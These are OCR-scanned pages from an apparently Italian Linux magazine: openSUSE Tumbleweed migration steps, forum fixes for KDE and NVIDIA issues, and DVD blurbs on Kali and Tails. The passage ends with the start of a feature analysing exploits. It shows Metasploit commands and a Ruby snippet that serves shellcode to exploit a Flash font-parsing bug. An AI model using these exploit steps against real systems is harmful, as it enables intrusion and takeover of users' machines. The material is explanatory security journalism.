esempio, la visualizzazione di un messaggio in 
cui si spiega che l'operazione non è permessa. 
Dopo aver deciso cosa fare occorre salvare il 
file e riavviare init per attivare le modifiche 
appena effettuate. Questa operazione può esse- 
re effettuata eseguendo, sempre da utente root, 
il comando /sbin/init q. 


La lettera del mese 


UNA OPENSUSE PARTICOLARE 


Spinto dalla voglia di sperimentare qualcosa di nuovo, 
X* ho installato openSUSE. Devo dire di esserne rimasto 
piacevolmente colpito, ma vorrei provare un sistema che 
non segua rilasci semestrali. Ho letto in rete che openSUSE 
Tumbleweed potrebbe essere la soluzione che sto cercando. 
Come potrei installarla in tutta sicurezza? 
Andrea 


Caro Andrea, in ctfetti la versione Tumbleweed (Attp://itopensuse.org/ 
Portal:Tumbleweed) è una valida alternativa per chi vuole avere i vantaggi 

di una distribuzione mainstream unita a quelli di una distro costantemente 
aggiornata. Questa edizione di openSUSE è consigliata a tutti gli utenti che 
Vogliono avere dei pacchetti più recenti di quelli inseriti nella distribuzio- 

ne stabile. 1 pacchetti rilasciati con versioni più nuove includono il kernel 
Linux, applicazioni di rete, suite d'ufficio, desktop manager e molto altro 
ancora. Poiché gli aggiornamenti del kernel sono molto frequenti, occorre 
sottolineare che gli utenti che utilizzano driver proprietari devono prestare 
maggiore attenzione poiché potrebbero dover intervenire da riga di comando 
per risolvere qualche problema. Fatta questa doverosa premessa, possiamo 
dire che installare openSUSE Tumbleweed non è affatto complicato. Parten- 
do da una installazione “standard” di openSUSE 12.2, è necessario modi- 


ficare alcuni repository. La rimozione può essere fatta tramite Yast, ma per 


completezza indicheremo la procedura da riga di comando. Per visualizzare 
l'elenco dei repository attualmente configurati basta eseguire, da terminale, il 
comando zypper Ir. | repository da sostituire sono repo-12.2-non-oss, repo- 
12.2-0ss e repo-12.2-update. Per rimuoverli, ricordando i numeri associati 
dal comando zypper Ir, basta eseguire sudo zypper rr numeri_dei_repo- 
sitory. A questo punto, sempre da riga di comando, potremo inserire i nuovi 
repository per Tumbleweed: 


sudo zypper ar --refresh http:// download.opensuse.org/1 
distribution/ openSUSE-current/repo/oss/ 
‘openSUSE Current 0Ss' 

sudo zypper ar --refresh http:// 1 
download.opensuse.org/distribution/ openSUSE-current/ 
repo/non-oss/ ‘openSUSE Current non-0SS' 

sudo zypper ar --refresh http:// 1 
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download.opensuse.org/update/ 
openSUSE-current/ ‘openSUSE Current updates' 


L'opzione --refresh serve ad aggiornare automaticamente ogni repository 
ad ogni operazione eseguita con zypper. A questo punto, occorre abilitare 
il repository di Tumbleweed, quindi, da terminale eseguiamo il comando 
seguente: 


sudo zypper ar -refresh http:// 1 
download.opensuse.org/repositories/ openSUSE: / 
Tumbleweed/standard/Tumbleweed 


Oltre a questi repository di base, anche in openSUSE Tumbleweed 

è disponibile Packman. Questo repository fornisce molti software 
aggiuntivi suddivisi in quattro categorie: Essentials, che include codec 
ed applicazioni audio e video; Multimedia, che contiene altre applica- 
zioni multimediali; Extra, che rende disponibili applicazioni di rete; 
Games, che include i giochi. Questi quattro repository possono anche 
essere configurati ed abilitati singolarmente o in gruppo. In questo caso, 
mostreremo come abilitarli tutti e quattro contemporaneamente. Da riga 
di comando, come nel caso precedente, basterà eseguire il comando 
zypper ar --refresh packman http://packman.inode.at/suse/open- 
SUSE_Tumbleweed packman. In questo momento tutti i repository 
sono correttamente abilitati e configurati, quindi, non resta che passare 
all'aggiornamento della distribuzione stabile a Tumbleweed. Per tarlo 
occorre eseguire da riga di comando sudo zypper dup, La prima volta 
che sarà eseguito questo comando si dovranno accettare le chiavi GPG 
dei repository aggiunti. Un'altra caratteristica particolarmente evidente 
in Tumbleweed è la gestione dei “rivenditori” dei pacchetti. In generale, 
l'aggiornamento sarà trasparente all'utente ma, di tanto in tanto, potrebbe 
essere richiesto di autorizzare il cambio di rivenditore poiché un repo- 
sitory potrebbe contenere una versione più aggiornata del pacchetto in 
uso e presente nel repository utilizzato. Se il computer è equipaggiato 
con una scheda grafica AMD o NVIDIA, consigliamo di consultare le 
apposite sezioni del wiki di openSUSE. Per schede con driver proprietari 
NVIDIA l'indirizzo è http://tinyurl.com/Nvidia-Tumbleweed. mentre per 
le AMD Affp://tinyurl.com/AMD-Tumbleweed. 
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SOLUZIONI DAL FORUM 


Ogni mese i thread più interessanti estratti dal forum di Linux Magazine. 
Se non fai ancora parte della nostra squadra, iscriviti subito! Il nostro sito 
è pronto a ospitare esperti, neofiti o semplicemente chi ne vuole sapere 
di più a proposito di GNU/Linux e di Software Libero 


Sistema/Kde, Gnome e gli altri 


DOMANDA - Salve, ho un quesito da porvi: vorrei integrare 
i font di sistema openSUSE (ambiente desktop KDE) nella fi- 
nestra di YaST2. Ho provato ad utilizzare QT Configuration, 
ma nel momento in cui salvo i cambiamenti questi sembrano 
come "non presenti". Sembra che il sistema sia bloccato sul 
font Arial Sans. Come posso procedere per risolvere? 


SOLUZIONE » Il quesito è posto dall'utente Callejon che ne 
fornisce anche la soluzione. Prima di riportarla vediamo qual è 
il punto essenziale: i font utilizzati dal modulo YaST2 piacciono 
veramente a poche persone e questo a dispetto di una distribu- 
zione (OpenSUSE) che probabilmente presenta di default l'am- 
biente desktop più sobrio ed elegante rispetto alla maggior parte 
delle distribuzioni. Lo strumento utilizzato dall'utente Callejon, 
QT Configuration (http:/gt-project.org/doc/gi-4.8/gtconfig.html), è 
quello giusto. È sufficiente acquisire i diritti di amministratore 
e lanciare il comando qteonfig per trovarsi l'interfaccia grafica 
visibile in Figura |. 


[NP Qt Comigurazion PS 
| Be. teip 


fanti > si TO 


‘ìppeatanco Fornu | intartata, ‘Printer, Phanom. 


| Defauit Font 
Use this tab to selact the ri 
| default font for yer Ot doble Paletizà sii iii UL 
appiicatione. The selected ‘ 
font ts sto Critiaty ns dl pete ia 
t} Sample text) in the fine eat |. Ti È 7 
| below ne Farmi Style and I mana 
Paint Ste drop down lists. Sampie Tex i 


ot has a powerful font 
subsnitution feature that 
affows you to specéy a lst af 
subiutute fonts. Substrute 
fonts are usad when a font 

li cannot be loaded, ar if the 

N} spocined font deesnt have a 

Il particular character. 

‘ 

|} For sxample, if you select the 
font Lucida, wiuch dowsnt 

[] have korean characters. but 

| need to show some rorean 


famidy you can do 50 by 
N adding Mincho to the fist 
Once Minche ts added, ary [RAV 
Korean Characters that are A 
‘not found in the Lucida fort \ 
wii be taken from the Mincho INI 
Mfont. Because the 

N substitutions are lists, you 

can also select multipia 

fanulies, such as Song Ti (tor 
use with Chinese test) 


Î Fig. 1 * Con QT Configuration possiamo personalizzare diversi 
aspetti 
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Michele Petrecca 


Detto questo, vediamo come procedere: nell'interfaccia di QT 
Configuration clicchiamo sul tab Fonts. La scritta Sample Text 
è di esempio per analizzare subito la qualità del font utilizzato. 
Nel riquadro Deafult Font il menu a tendina Family permette di 
selezionare la famiglia di appartenenza dei font (Adobe, Arial 
etc). Possiamo modificarne l'aspetto scegliendo lo stile (gras- 
setto e/o corsivo) dal menu a tendina Style e in Point Size la 
dimensione. Tutti i cambi appariranno in tempo reale sul testo 
di esempio Sample Text. A questo punto andiamo nel menu File 
salviamo la configurazione e dovremo avere il nuovo font attivo 
per YaST2. Eventualmente le modifiche non dovessero essere 
state applicate, si provi a riavviare la sessione. 


Distribuzioni/SuSE 
EFFETTI SPECIALI! 


DOMANDA » In data 19/11/2013 ho scaricato il DVD di Open- 
SUSE 13.1 64 bit e l'ho installata. Devo dire che mi piace molto, 
tuttavia c'è una cosa che proprio mi infastidisce e sono gli "effetti 
speciali" del desktop, che sembra vengano automaticamente abili- 
tati, effetti di cui non ho mai sentito il bisogno! Ad esempio, se apro 
un'applicazione e poi voglio metterla a tutto schermo, l'espansione 
della finestra dell'applicativo avviene gradualmente, mentre vor- 
rei che lo facesse istantaneamente e senza troppi “fronzoli” grafici. 
Come posso rimuovere questi effetti? L'ambiente grafico in uso è 
KDE. 


SOLUZIONE » Il quesito è stato posto dall'utente Sargon6 e ri- 
sponde l'utente michele.p che suggerisce di andare su Impostazioni 
di sistema, dal menu generale. Da questo punto va cercata la voce 
Effetti del desktop cliccando su di essa. Nella nuova finestra, visibile 
in Figura 2, occorre rimuovere dal riquadro Attivazione il segno di 
spunta alla casella Abilita gli effetti del desktop all'avvio. Tutto qui! 
Alla discussione partecipa anche l'utente Callejon il quale suggerisce 
l'uso dell'ambiente desktop Gnome ma con l'utente Sargon6 che ri- 
formula la medesima richiesta: come disattivare gli effetti del desktop 
qualora si dovessero presentare di default? La risposta è immediata: di 
default Gnome 3 non ha effetti grafici stand-alone come avviene per 
l'ambiente KDE a meno di abilitarli con pacchetti esterni, ad esempio 
Compiz (www.compiz.org). Nella versione 3, Gnome presenta due “va- 
rianti”: Gnome Shell c Gnome Classic, ma c'è da fare una riflessione 


x EITSCII dai Cnnarop - mECITmON 3 sottama 
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Cantaara gli eitesti del desttoo de 
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Anivertena 
Y Asato gi stone Sul devitap alacse 
A alert cui tondttp pesvone ssnero attuati p Gasituato ti quafrioei smamante tan lo scartata 
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MW Fig 2 Coniltool OT Configuration possiamo personalizzare per 
ogni singolo utente diverse impostazioni 


sulle risorse richieste: chi ha seguito, o usa, l'ambiente del “Piedone” è 
a conoscenza che, fin dal rilascio della versione 3. la modalità standard 
di Gnome 3 richiede obbligatoriamente il supporto all'accelerazione 
3D in hardware della scheda grafica permettendo così il lancio di Gno- 
me Shell. Quando questa accelerazione non è disponibile, vuoi perché 
non si ha un driver adatto, vuoi perché la scheda non è supportata, vie- 
ne utilizzata la modalità fall-back mode. Questa “modalità di riserva” 
è però stata rimossa negli ultimi rilasci in favore dell'uso di LLVM 
(http:/Iilvm.0rg/) e Gallium3D (www.freedesktop.org/\wiki/Software/gal- 
lium/) che dovrebbero riuscire (il condizionale è d'obbligo) a permet- 
tere l'avvio di Gnome Shell nelle svariate situazioni di assenza di ac- 
celerazione 3D in hardware. Se questo dovesse essere il caso, e non si 
vuole che venga avviata questa modalità, che rimane piuttosto avida di 
risorse soprattutto in computer un po' datati, è sempre possibile passa- 
re alla modalità classica installando il pacchetto gnome-shell-classic 
(comando zypper install gnome-shell-classic). Effettuata questa ope- 
razione riavviamo il computer e al nuovo login opteremo per Gnome 
Classic (Figura 3), da non confondere con Gnome 2! 


® Fig. 3 è Un click sull'icona a forma di ruota dentata permette il 
passaggio a Gnome Classic 


Distribuzioni/SuSE 


DOMANDA * Dopo aver installato OpenSUSE 13.1 64 bit con am- 
biente desktop KDE su un portatile, l'ho installato anche sul fisso, 
ma sono incappato in qualche inaspettato problema, primo fra 


tutti la risoluzione video. È perennemente impostata a 640x480! Se 
dal menu di Kirchoff seleziono Menu — Impostazioni di sistema 
— Schermo e video — Configurazione dello schermo — Elenco 
delle risoluzioni disponibili vedo che quella riportata è l'unica di- 
sponibile! Come risolvo? L'output del comando Ispci evidenzia la 
seguente scheda grafica: 


00:0d.0 VGA compatible controller [0300]: NVIDIA Corporation 
C61 [GeForce 6150SE nForce 430] [10de:03d0] (rev a2) 
Subsystem: ASRock Incorporation Device [1849:03d0] 
Kernel modules: nvidiafb, nouveau 


dal quale si evince che trattasi di una NVIDIA Corporation C61 
[GeForce 6150SE nForce 430] e il modulo in uso è nouveau. Come 
posso risolvere questo fastidioso problema? 


SOLUZIONE » Il quesito è posto dall'utente Sargon6 il quale, 
poco dopo, è lui stesso a riportare una possibile soluzione mante- 
nendo il driver open source nouveau: “Ho provato una possibile so- 
luzione e sembra andare bene anche se mi rimane sempre una sola 
scelta possibile come risoluzione. Senza installare nulla ho aperto 
il modulo YaST e dal gruppo Sistema seleziono Boot Loader. Nel 
nuovo pannello click su Opzioni di boot loader e nell'ulteriore 
pannello dal menu a tendina Modalità VGA opto, ad esempio, per 
il valore 1024x768, 24 bit (modo 0x318). Riavvio il computer e 
noto che la risoluzione dello schermo è 1024x768. In questo modo 
riesco a lavorare molto meglio. Ma, ancora una volta, con il percor- 
so riportato in precedenza, se vado ad elencare il numero di riso- 
luzioni disponibili trovo che 1024x768 è l'unica possibile. Avendo 
una scheda video GeForce 6150SE, risolverei il problema scari- 
cando (http://it.opensuse.org/SDB:NVIDIA_drivers) i pacchetti per le 
schede nVIDIA recenti (GeForce 6 e GeForce 7)?”. La risposta non 
può che essere affermativa e infatti è lo stesso utente Sargon6 a 
riportare nuovamente la dinamica che è consistita nell'installare il 
pacchetto x11-video-nvidiaG01 (e relative dipendenze risolte au- 
tomaticamente dal gestore dei pacchetti) contenente i driver nella 
versione 173.xx.yy di nVIDIA permettendo così di avere anche il 
tool NVIDIA X Server Settings (Figura 4) dove è possibile optare 
per diverse scelte nella risoluzione. 


arver Settings x) 


Thermal Sensor informativa 
Do 


Target Gu 
Provider GPU internal 


Termperature 41C 


Temperature 


"0" pr dn 


]  nvidha-settings Configuration 


W Fig. 4 » Il comando nvidia-settings permette di avviare lo 
strumento di configurazione della scheda nVIDIA 


Distribuzioni 


KALI LINUX 1.0.6 


na eccellente distribuzione, esplicitamente pensata per il pene- 

tretion testing. Basata su Debian, ha dalla sua il pieno supporto 
dei dispositivi ARM. La grafica è molto pulita e consente di consente 
di lavorare con semplicità ed efficacia, senza inutili distrazioni. Kali 
Linux è stata sviluppata dallo stesso team autore di una delle migliori 
distro orientate alla sicurezza informatica: BackTrack che, a sua volta, 
era basata su Ubuntu. Rispetto a BackTrack, Kali si dimostra più facil- 
mente aggiornabile e più agile per attuare pratiche di tipo “offensivo” 
Interessante la possibilità di effettuare il boot in “Live Forensic Mode”: 
in questa modalità gli Hard Disk interni non verranno minimamente 
modificati e viene disabilitato l'auto mount per i dispositivi rimovibili. 
Nella distribuzione sono inclusi oltre 300 tool, molti dei quali ereditati 


SystemRescueCD 4.0.1 
COME UTILIZZARE IL DVD-ROM 


Clonezilla 2.2,1-25; EndianFirewall 3.0.0; Free 


n 


da BackTrack. Di questi 300, Kali Linux ne indica 10 come “top tools”; 


Aircrack - Per il wireless cracking 

Burpsuite - Per testare la sicurezza delle Web App 

Hydra - per il brute forcing di password online 

John - per il crack di password offline 

Maltego - Perla raccolta di informazioni 

Metasploit Framework - per l'exploitation 

Nmap — per effettuare la scansione delle reti 

Oswap-zap - per trovare vulnerabilità nelle applicazioni Web 
Sqlmap - per scovare vulnerabilità relative a SQL injection 
Wireshaek - Un efficace analizzatore dei protocolli di rete 


IRANIRIINOR 


Boot menu 


Live Camdb4) 


{ 64 f 


AA 


AS 9.2.1.1; MOn0wall 1.8.1; 


Le distribuzioni principali presenti all'interno del DVD-Rom sono direttamente avviabili dal supporto digitale, quindi installabili 0 
eseguibili in modalità LIVE. Basta inserire il DVD-Rom nell'apposito lettore e riavviare il PC. Dopo pochi secondi apparirà l'inter- 
faccia per l'avvio della distribuzione o per la sua esecuzione in modalità LIVE. Per tutte le altre basta seguire le seguenti istruzioni. 


srioni/rtvet-10-149-b/index htm 


L'INTERFACCIA 


Per le distribuzioni disponibili sotto forma di immagini IS0, apriamo il 
DVD-Rom con il file manager e clicchiamo due vote sul file index.htm. 
A questo punto, dovrebbe apparire l'interfaccia di gestione: Clicchiamo 
sull'illustrazione o sulla voce Distribuzioni presente nel menu'a destra. 
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= 


Indice di /media/backup/Distribuzioni/dvd-10-149-b/distribuzioni/ 
e Dimensioni Data ultima modifica 

Da se 2 20/08/13 12:23:57 
200213 12:30:01 


DOWNLOAD ISO 


Da qui, possiamo scaricare l'immagine ISO della distribuzione semplice- 

mente accedendo ‘alla sua eventuale cartella e.premendo sul relativo link. 
Dopodiché, possiamo masterizzare l'150 su Cd-Rom e DVD-Rom per crea- 
re il supporto di installazione o trasferirla su una pendrive USB bootable. 


brpisa Po gpa 1 


TAILS 0.22.1.1 


ha distribuzione nata conlo scopo di garantire la massima riserva- 
i agli utenti. Già il nome rivela la natura di questa distro, Tails 
è infatti l'acronimo di The Amnestic Incognito Live System. Al fine di 
garantire l'anonimato e la totale privacy, Tails utilizza TOR (The Onion 
Router) perl’accesso è internet. Come noto, TOR è una soluzione molto 
efficace che protegge l'utente dall'analisi del traffico dati, attraverso 
l'utilizzo di un network di router che gestisce il traffico in modo crit- 
tografato in modo che, anche intercettando i pacchetti, non si riesce a 
risalire all'origine e alla destinazione degli stessi. Tails può essere avviato 
da chiavetta USB o da CD: in questo modo, potremo utilizzarlo all'oc- 
correnza, quando sentiremo la necessità della più totale privacy per la 
nostra navigazione internet. Il browser di default è Iceweasel, già confi- 
gurato per navigare in completo anonimato e settato per forzare l'utiliz- 


: Caine 5.0; Zenwalk 7.4 


Creare un nuovo progetto: Progetti recenti: 


Progetto audio Im-138.is0 


dg Crea un CD audio tradizionale 


Mageia-2-1586-DVD.iso 
KNOPPIX_V7.0.1DVD-2012-05-24-E 
Progetto dati 


I Im-137-b.iso 
=| Crea un CDo DVD di dati 


linuxmint-13-mate-dvd-32bit.iso 


Progetto video 
[an | Crea un DvD video o un Sven 


Copia disco 
{ Crea una copia 1:1 di un CD/DVO 


Masterizza immagine 
Masterizza un'immagine CO/DVD esistente su disco 


MASTERIZZAZIONE SUPPORTI 


In'ambiente Gnome possiamo utilizzare Brasero, su KDE K3b. Nel 

primo caso, avviamo il software, clicchiamo su Masterizza immagine 
e selezioniamo l'ISO da masterizzare. Con K3b, invece, clicchiamo su 
Strumenti/Masterizza immagine ISO e selezioniamo l'immagine ISO. 


di 


Linux Magazine 


- Fig.2 Il file manager predefinito è Nautilus, ora aggiornato 
alla release 3.8.2 


zo del protocollo HTTPS ogni qualvolta si possibile. Da segnalare sono 
anche: Claws Mail, perla gestione della posta elettronica; Pidgin, come 
messenger; Open PGP encryption Applet, per mantenere la clipboard 
cifrata; Morence Virtual Keyboard, una tastiera virtuale da utilizzare 
direttamente “a schermo’ in grado di bypassare eventualil keylogger 
hardware presenti nel sistema. Insomma una garanzia davvero totale 
per la nostra privacy; ulteriormente rafforzata dalla caratteristica di 
cancellare completamente il contenuto della RAM al riavvio e allo 
spegnimento del sistema. In definitiva, una piattaforma ottima, magari 
come “seconda macchina” magari per effettuare transazioni finanziarie 
o altre operazioni “sensibili! In questa versione sono stati sistemati 
numerosi piccoli bug che affliggevano la precedente, specialmente nel 
delicato ambito della sicurezza. 


Aspkatem Macci Sricom de @ (fì (Ea 2 i MAII6, 10.40 A © 


mr VINTATITA TRE ANATRA RIAVERE TIT ANTITE TN Jar Mancaserh U ame 
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Congratulations. Your browser is 
configured to use Tor. 


Zoe Seti 


Since: Aug de 11:3036 


Pieese refer bo the Lor further mdormation about using Tor aefale Foa are 


now fr e Internet ancnymousty. 


UNetbootin 


(©. Distribution [=- Select Distribution == s] 


Benvenuti in UNetbootin, il Netboot Installer universale, Uso: 


== Select Version 


1. Selezionare dalla lista qui sopra una distribuzione ed una version 
specificare manualmente i file da caricare qui sotto. i 
2. Selezionare un tipo di installazione e fare clic sù OK per iniziarla. 


© cas a rara i eran Re AN 


rea 


Options: 
.{ Show All Drives (Use with Care) 


Type: [Drive usB 2] Drive: [imme =] | 


USI 


PENDRIVE USB AVVIABILE 


Installiamo UNetbootin (Mttp://unetbootin.sourceforge.net). Colteghia- 
mo la pendrive USB al PC; selezioniamo Diskimage e premiamo su 
‘+ per trovare l’ISO, A questo punto, clicchiamo su OK e aspettiamo 
che la procedura termini. Subito dopo avviamo it PC da periferica USB, 
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Abbiamo analizzato i sorgenti dei principali software buca-sistema alla 
scoperta delle tecniche più estreme di programmazione. 


u YouTube esiste una particolare categoria di filmati che mo- 

strano i fallimenti più eclatanti che accadono nel mondo. Per 

trovarli basta cercare le parole “epic fail compilation”: il diverti- 
mento è assicurato. In questo caso specifico, invece, ci occuperemo 
dei fallimenti degli sviluppatori ovvero i bug presenti in un program- 
ma. Un bug non è altro che un errore commesso dal programmatore 
durante la stesura del codice di un software. Questo causa un fun- 
zionamento anomalo del programma che, tra le altre cose, espone 
il sistema sui cui gira, i dati che gestisce e gli utenti stessi che lo 
utilizzano al rischio di un attacco informatico. Ovviamente, come per 
i video dei fallimenti che si trovano su YouTube, anche nella program- 
mazione esistono errori di diversa gravità: un conto è ribaltare un ser- 
vizio di piatti, un’altra cosa è far cadere un albero sopra la propria au- 
tomobile. Nel campo della programmazione, possiamo considerare 
non particolarmente gravi i bug che comportano semplicemente il 
blocco di un programma, mentre molto più pericolosi sono quelli che 
consentono ad un malintenzionato di ottenere il controllo sul sistema 
o i dati di un ignaro utente. Naturalmente, è importante anche tenere 
conto del contesto: è ovvio che un bug scoperto all’interno di un pro- 
gramma utilizzato da milioni di persone assume maggiore importan- 


RR TE PARTE 
I PUNTI DEBOLI DI MAC OS X 


Anche se non sembra, Mac 0S X è continuamente soggetto a 
vulnerabilità, anche gravi. La sensazione è che non sia così 
solo perché, a causa della sua scarsa diffusione, i cracker 
preferiscono dedicare le loro attenzioni a Windows. Recente- 
mente, però, è stato pubblicato un exploit (Attp:/g00.gl/uBaKyl) 
che affligge la versione del tool sudo rilasciata con Mac 0S.X 
Questo, in particolare, è il programma che sui sistemi Unix 
consente l'esecuzione di un comando come utente ammi- 
nistratore pur non essendolo. Questo bug permette molto 
facilmente di ottenere privilegi di amministrazione, quindi, 
un cracker potrebbe usarlo per diventare amministratore e 
fare qualsiasi cosa dopo avere preso il controllo dell'account 
di un utente del sistema di casa Apple. È anche disponibile un 
exploit per Metasploit, che è possibile scaricare al seguente 


indirizzo: ttp:/g00.gl/DEwtW. 
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Luca Tringali 


za e, di conseguenza, è considerato molto più pericoloso. Nel nostro 
caso. abbiamo stilato un elenco di dieci bug che, secondo i nostri 
esperti, sono tra i più pericolosi recentemente scoperti. L'obiettivo è 
analizzare il codice vulnerabile, per capire la natura del problema e 
individuare dove il programmatore ha sbagliato. Inoltre, dove possi- 
bile, commenteremo il codice dei cosiddetti exploit, i programmi in 
grado di sfruttare i bug per scopi malevoli, ad esempio prendere pos- 
sesso di dati e sistemi altrui. Infine, simuleremo una serie di attacchi 
utilizzando gli exploit che sfruttano i bug analizzati tramite l'utilizzo di 
un particolare software: il framework Metasploit (www.metasploit. 
com). Si tratta di un sofisticato software che consente agli esperti di 
sicurezza di testare le vulnerabilità scoperte in modo da valutarne 
empiricamente gli effetti. Metasploit è gratuito e disponibile per Win- 
dows e GNU/Linux, inoltre, dispone di una nutrita collezione di exploit 
(circa un migliaio) e payload. | payload sono istruzioni in codice 
binario che vengono inserite nella RAM del computer vittima dall’ex- 
ploit e che, quando vengono eseguite, creano un punto di accesso 
per il “pirata”: di solito si tratta di una shell remota. L'exploit è “the 
proof of concept”, ovvero rappresenta la dimostrazione dell’esi- 
stenza di una vulnerabilità in un programma. Un exploit può essere 
qualsiasi cosa: una stringa di testo, una pagina web, un file corrot- 
to o più generalmente una serie di operazioni diverse. Per portare a 
termine un exploit è necessario, di norma, eseguire diverse azioni, 
che per questo motivo vengono raccolte in un programma che au- 
tomatizza il tutto. Il software può essere un normale programma in 
C++ fo in un altro linguaggio di programmazione, per esempio PHP) 
oppure essere uno script che viene interpretato dalla shell Bash di 
GNU/Linux, dal prompt dei comandi di Windows, o ancora dalla con- 
sole di Metasploit. Quest'ultimo, infatti, dispone di diversi strumenti, 
ma quello che utilizzeremo noi per avviare gli exploit è il terminale, 
chiamato msfconsole. Per i sistemi Windows esiste anche una in- 
terfaccia grafica non ufficiale chiamata msfgui, che è possibile sca- 
ricare all'indirizzo www.scriptjunkie.us/msfqui. Metasploit è dunque 
uno strumento che rende quasi banale eseguire un attacco contro 
un sistema. Ricordiamo sempre che da grandi poteri derivano grandi 
responsabilità: Metasploit può facilitare l'attuazione di pratiche illega- 
li, sta all'utente non cedere alla tentazione ed usare gli exploit esclu- 
sivamente per testare la sicurezza del proprio computer. Per avviare 
Metasploit, lavorando in ambiente GNU/Linux, è sufficiente eseguire 
il comando msfconsole ed attendere che si presenti il prompt per 


accedere agli strumenti di del software. Per eseguire un exploit la 
procedura prevede tre passi fondamentali: scegliere l’exploit che si 
vuole testare con il comando use seguito dal percorso relativo allo 
script; impostare eventuali parametri (per esempio l'indirizzo IP della 
vittima, in locale 127.0.0.1); lanciare l’exploit con il comando exploit. 
Ma non indugiamo oltre e passiamo all’analisi delle 10 vulnerabilità 
più pericolose dell'ultimo anno. 


TI COMANDO IN UN FLASH 


A causa di un problema nel parsing dei font presenti nei file SWF 
(i file Flash), è possibile per un pirata eseguire codice arbitrario su 
una macchina vittima e addirittura ottenere una shell. Questo signifi 
ca che tutti i computer contenenti una versione di Flash precedente 
alla 11.3 permettono un facile accesso alla shell senza bisogno di 
inserire password. Tra l’altro, questo bug si presenta su tutti i sistemi 
operativi. Ma vediamo di capire in che cosa consiste l’exploit. Tutto 
parte da un file SWF che viene aperto in Flash Player, magari caricato 
da una pagina web. Questo file contiene un testo scritto con un font 
allegato all’SWF stesso. Il fatto è che questo font è corrotto 0, meglio, 
semplicemente non è un vero font: si tratta di un file TXT contenente 
codice che consente di accedere ad una shell di sistema (Fig. 1). Il 
codice malevolo, quindi, non si trova all’interno di una pagina web e 
nemmeno nel file SWF, che sono solo vettori dell'infezione. Il pay- 
load (codice malevolo) è presente nel file di font. Il problema è che, 
siccome Flash Player non verifica correttamente la dimensione del 
file font, andrà in buffer overflow mentre cerca di leggerlo. La suite 
Metasploit contiene un test per verificare il funzionamento di que- 
sto exploit sul proprio sistema, lo troviamo in modules/exploits/ 
windows/browser/adobe_flash_font_parsing_code_exec. 
rb. Possiamo, quindi eseguirlo dalla msfconsole con i seguenti 
comandi: 


use exploit/windows/browser/adobe flash font parsingl 
_code exec 
exploit 


Eseguendo l’exploit, Mestasploit costruirà un falso webserver sulla 
macchina locale, ed un finto client che va a leggere una pagina HTML 
contenente un file SWF (che si trova nella cartellametasploit/apps/ 
pro/msf3/data/exploits/CVE-2012-1535), in modo da eseguire 
il test automaticamente. Possiamo dare un'occhiata al file Ruby per 
capire come funziona esattamente l’exploit. Per prima cosa, viene 
costruita la pagina HTML. Questa viene poi fatta aprire automatica- 
mente ad un client fittizio, che, quindi, carica il file SWF. Questo cer- 
cherà di leggere il file TXT che, in teoria, dovrebbe contenere il font, 
ma in realtà contiene istruzioni in linguaggio macchina per aprire un 
prompt dei comandi. 

Nel momento in cui Flash va in overflow, il contenuto del file di font 
viene scritto in memoria andando oltre i “confini” previsti, e sovra- 
scrive l'indirizzo di return prendendo il controllo dell'esecuzione 
del programma usando una tecnica ROP (Return Oriented Pro- 
gramming). Questo significa che quando l’operazione di lettura del 
file di font è terminata, la vittima eseguirà il codice binario contenuto 
al suo interno, invece di continuare con l'esecuzione normale del pro- 
gramma Flash Player: 


# The TXT payload request 
if request.uri =- /\.txt$/ 
flash_ version = request.headers[‘x-flash-} 
version’] 
shellcode = get _payload(my target, flash! 
_version).unpack(‘H*’')[0] 
print _status(“Sending Payload”) 
send response(cli, shellcode, 1 
{ ‘Content-Type’ => ‘text/plain’ }) 
return 


end 


Questo è il segmento di codice che si occupa di fornire al client il 
file di font corrotto: quando lo script di Metasploit si accorge che la 
vittima sta cercando il file TXT (contenente il font), non fa altro che 
inviargli lo shellcode (codice binario che esegue una shell di siste- 
ma) costruito appositamente per la versione di Flash che la vittima 
sta usando. Questo codice verrà eseguito e aprirà una shell, cui il 
pirata potrà poi accedere liberamente tramite l’utility meterpreter, 
presente in Metasploit. La colpa, come abbiamo detto, non è del file 
SWF in se, che non ha fatto altro che fornire le istruzioni seguenti: 


this. myfont fmt = new TextFormat(); 
this. myfont_fmt.font = “PSpop"; 
this. _myfont_fmt.size = 40; 

this. text txt.defaultTextFormat = this. myfont fmt; 
Nello specifico, PSpop è il nome assegnato al riferimento del file 
payload.txt, che contiene il codice malevolo. Naturalmente, in una 
situazione normale non si verifica overflow perché Flash Player cal- 
cola la dimensione del file se questo è scritto con la sintassi corretta 
per un file font. Dopo avere avviato l’exploit, il codice di payload viene 
eseguito e, quindi, attiva una console di sistema. A questo punto, 
il cracker è libero di eseguire qualsiasi comando voglia. Per fortu- 
na, su sistemi di tipo Unix il rischio è limitato perché il meccanismo 
dei permessi di sistema consente al pirata di arrivare soltanto ai dati 
che non necessitano di privilegi di amministrazione. Il pirata potreb- 
be comunque tentare di bloccare il sistema della vittima creando file 
casuali fino ad intasare l’intero disco rigido. Ciò che rende questo 


Fig. 1: Sfruttando il bug del player Flash otteniamo una shell 


bug estremamente pericoloso è la facilità di diffusione: è addirittura 
possibile inserire un file Flash all’interno di un documento Word, vei- 
colando, quindi, il codice malevolo senza che l’utente vittima possa 
accorgersene. Ed infatti, è proprio quello che è successo: si è sco- 
perto che a molte persone era stato inviato un file dal nome “iPhone 
5 Battery.doc”, che in teoria avrebbe dovuto contenere informazioni 
utili sulla batteria del nuovo iPhone. Le informazioni, ovviamente, era- 
no presenti nel documento, ed apparivano come un normale foglio di 
Word quando l’utente lo apriva. Tuttavia, senza che la vittima potesse 
accorgersene, veniva anche caricato un file SWF invisibile contenuto 
nel file DOC (per chi non lo sapesse, ogni file DOC è in realtà un 
archivio Zip che contiene sia il testo sia i vari file incorporati, come le 
immagini o i filmati Flash). Questo file scaricava nel computer della 
vittima una libreria (pubblicata precedentemente dal pirata su un sito 
Internet) che costituiva una backdoor, fornendo, quindi, al cracker la 
possibilità di collegarsi al computer dell'utente in qualsiasi momento, 
anche se il file DOC infettato non fosse stato più aperto. Se volete 
sapere di più a proposito di questo attacco, vi consigliamo di con- 
trollare i test eseguiti da AlienVault: http://goo.gl/bCmeLe. 


ANONIMI MA NON TROPPO! 


“Un falso senso di sicurezza è peggio che nessuna sicurezza”, dice- 
va Marc Thibault. E questa frase è continuamente ripetuta da chi si 
occupa di sicurezza informatica. È per questo motivo che, quando è 
stata scoperta una vulnerabilità in Firefox capace di rivelare l'identità 
di persone che tentavano di proteggersi dietro la rete anonima Tor, si 
è subito compresa la grande pericolosità del bug che ci apprestiamo 
ad analizzare (Fig. 2). Cominciamo dall'inizio. All’interno di Internet 
